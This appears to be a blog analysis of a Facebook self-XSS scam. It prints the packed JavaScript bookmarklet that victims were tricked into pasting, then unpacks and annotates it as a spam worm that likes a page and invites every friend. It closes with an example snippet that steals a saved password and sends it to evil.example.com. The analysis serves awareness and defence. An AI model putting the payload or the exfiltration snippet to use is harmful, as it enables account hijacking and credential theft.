Facebook social engineering XSS


Found in the wild (http://www.facebook.com/pages/Teacher-asked-Why-do-Boys-Walk-faster-then-Girls-Girls-Talk-more-then-Boys/125748790772279), this page attempts to trick users by instructing them to press Ctrl+C to copy hidden JavaScript, then Alt+D to select the address bar, and then paste and run this JavaScript:

javascript:(function(){a='app121760014508794_iji';b='app121760014508794_aja';rew='app121760014508794_rew';qwe='app121760014508794_qwe';qtt='app121760014508794_qtt';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('P e=["\p\g\l\g\I\g\k\g\h\D","\l\h\D\k\f","\o\f\h\v\k\f\q\f\j\h\J\D\Q\x","\y\g\x\x\f\j","\g\j\j\f\z\R\K\L\S","\p\n\k\A\f","\l\A\o\o\f\l\h","\k\g\G\f\q\f","\l\k\g\j\G","\L\r\A\l\f\v\p\f\j\h\l","\t\z\f\n\h\f\v\p\f\j\h","\t\k\g\t\G","\g\j\g\h\v\p\f\j\h","\x\g\l\u\n\h\t\y\v\p\f\j\h","\l\f\k\f\t\h\w\n\k\k","\l\o\q\w\g\j\p\g\h\f\w\T\r\z\q","\H\n\U\n\V\H\l\r\t\g\n\k\w\o\z\n\u\y\H\g\j\p\g\h\f\w\x\g\n\k\r\o\W\u\y\u","\l\A\I\q\g\h\X\g\n\k\r\o","\g\j\u\A\h","\o\f\h\v\k\f\q\f\j\h\l\J\D\K\n\o\Y\n\q\f","\Z\y\n\z\f","\u\r\u\w\t\r\j\h\f\j\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000'.split('|'),0,{}))})();

______________________________________

This looks like the output of the "Dean Edwards" packing tool, and according to http://www.strictly-software.com/unpacker, here is the unpacked code:
______________________________________

var variables = ["x76x69x73x69x62x69x6Cx69x74x79", "x73x74x79x6Cx65", "x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64", "x68x69x64x64x65x6E", "x69x6Ex6Ex65x72x48x54x4Dx4C", "x76x61x6Cx75x65", "x73x75x67x67x65x73x74", "x6Cx69x6Bx65x6Dx65", "x73x6Cx69x6Ex6B", "x4Dx6Fx75x73x65x45x76x65x6Ex74x73", "x63x72x65x61x74x65x45x76x65x6Ex74", "x63x6Cx69x63x6B", "x69x6Ex69x74x45x76x65x6Ex74", "x64x69x73x70x61x74x63x68x45x76x65x6Ex74", "x73x65x6Cx65x63x74x5Fx61x6Cx6C", "x73x67x6Dx5Fx69x6Ex76x69x74x65x5Fx66x6Fx72x6D", "x2Fx61x6Ax61x78x2Fx73x6Fx63x69x61x6Cx5Fx67x72x61x70x68x2Fx69x6Ex76x69x74x65x5Fx64x69x61x6Cx6Fx67x2Ex70x68x70", "x73x75x62x6Dx69x74x44x69x61x6Cx6Fx67", "x69x6Ex70x75x74", "x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65", "x53x68x61x72x65", "x70x6Fx70x5Fx63x6Fx6Ex74x65x6Ex74"];
d = document;
d[variables[2]](qtt)[variables[1]][variables[0]] = variables[3];
d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
s = d[variables[2]](variables[6]);
m = d[variables[2]](variables[7]);
sl = d[variables[2]](variables[8]);
c = d[variables[10]](variables[9]);
c[variables[12]](variables[11], true, true);
s[variables[13]](c);
setTimeout(function () {
fs[variables[14]]()
},
5000);
setTimeout(function () {
SocialGraphManager[variables[17]](variables[15], variables[16]);
setTimeout(function () {
c[variables[12]](variables[11], true, true);
sl[variables[13]](c);
setTimeout(function () {
inp = document[variables[19]](variables[18]);
for (i in inp) {
if (inp[i][variables[5]] == variables[20]) {
inp[i][variables[13]](c)
}
};
m[variables[13]](c);
setTimeout(function () {
d[variables[2]](qwe)[variables[4]] = d[variables[2]](rew)[variables[5]];
},
2000)
},
4000)
},
3000)
},
5000);

______________________________________

After writing a few lines of JavaScript in Firebug to decode the hex-escaped variables:

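// Print the entries of `variables` (the hex-escaped array above) as a quoted,
// comma-separated JS array literal that can be pasted straight back into the
// source. The engine has already decoded the \xNN escapes when the literal was
// evaluated, so joining the strings is all the "dehexing" that is needed.
// (The original line had an unbalanced string literal and left the list
// unterminated with a trailing comma.)
var outputstring = '["' + variables.join('", "') + '"]';
alert(outputstring);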

we get:

var variables = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "suggest", "likeme", "slink", "MouseEvents", "createEvent", "click", "initEvent", "dispatchEvent", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "input", "getElementsByTagName", "Share", "pop_content"];

and substituting the variables into the source:

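// Replace every `variables[i]` reference in the source text `src` (the unpacked
// listing above) with the decoded string literal, so the script reads as plain
// DOM calls. The square brackets must be escaped twice — once for the string
// literal and once for the RegExp — otherwise `[i]` reaches the RegExp as a
// character class and `variables[0]` would only ever match the text "variables0".
// `variables\[1\]` cannot match inside `variables[10]` because the closing
// bracket must follow the digit immediately.
for (var i = 0; i < variables.length; i++) {
  src = src.replace(new RegExp('variables\\[' + i + '\\]', 'g'), '"' + variables[i] + '"');
}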

we get a cleanly deobfuscated source:
______________________________________

// Deobfuscated payload: it drives Facebook's own page UI with synthetic click
// events. The ids held in a, b, qtt, qwe and rew are assigned in the
// bookmarklet's prologue (the `a='app121760014508794_iji'...` part of the
// packed line above) and are not part of this listing. `fs` and
// `SocialGraphManager` are not defined here either — presumably objects exposed
// by the Facebook page itself.
d = document;
// Hide the element whose id is in qtt.
d["getElementById"](qtt)["style"]["visibility"] = "hidden";
// Copy the value of element b into the markup of element a (an innerHTML write).
d["getElementById"](a)["innerHTML"] = d["getElementById"](b)["value"];
// The three page controls the script is going to click.
s = d["getElementById"]("suggest");
m = d["getElementById"]("likeme");
sl = d["getElementById"]("slink");
// One reusable synthetic click (bubbling, cancelable) dispatched on each target.
c = d["createEvent"]("MouseEvents");
c["initEvent"]("click", true, true);
// Click "suggest" — by its id, presumably opens the suggest-to-friends dialog.
s["dispatchEvent"](c);
setTimeout(function () {
// At 5 s: call select_all on the page-provided `fs` object — by its name,
// presumably selects every friend in the open dialog.
fs["select_all"]()
},
5000);
setTimeout(function () {
// Also at 5 s (registered second, so in practice it fires after select_all):
// submit the invite form through Facebook's own helper, which is what sends
// the suggestion to the selected friends.
SocialGraphManager["submitDialog"]("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
setTimeout(function () {
// 3 s later: click "slink".
c["initEvent"]("click", true, true);
sl["dispatchEvent"](c);
setTimeout(function () {
// 4 s later: click every <input> whose value is "Share". for...in over an
// HTMLCollection also visits non-element keys (length, item, ...); those have
// no "value" property, so the comparison simply skips them.
inp = document["getElementsByTagName"]("input");
for (i in inp) {
if (inp[i]["value"] == "Share") {
inp[i]["dispatchEvent"](c)
}
};
// Then click "likeme" — presumably the like action itself.
m["dispatchEvent"](c);
setTimeout(function () {
// 2 s later: copy the value of element rew into the markup of element qwe,
// mirroring the a/b copy at the start (purpose not determinable from this listing).
d["getElementById"](qwe)["innerHTML"] = d["getElementById"](rew)["value"];
},
2000)
},
4000)
},
3000)
},5000);

This clearly uses simulated mouse clicks to like the app and to suggest it to all of your friends. It could be worse and steal your password if you have it saved on the login page:

javascript:(function(){var ifr = document.createElement(“iframe”);ifr.src=”/login.php”;ifr.height=0;ifr.width=0;document.body.appendChild(ifr);setTimeout(function(){var mypass=ifr.contentWindow.document.getElementById(“pass”).value;new Image().src=”http://evil.example.com/evil.php?pass=”+mypass;alert(“Your password is “+mypass+” and I just sent it to evil.example.com”);},1000);})();

or send you exploits, or defriend all of your friends… Maybe people will use this as a learning opportunity, so that if something actually bad does happen, they won't get hit.
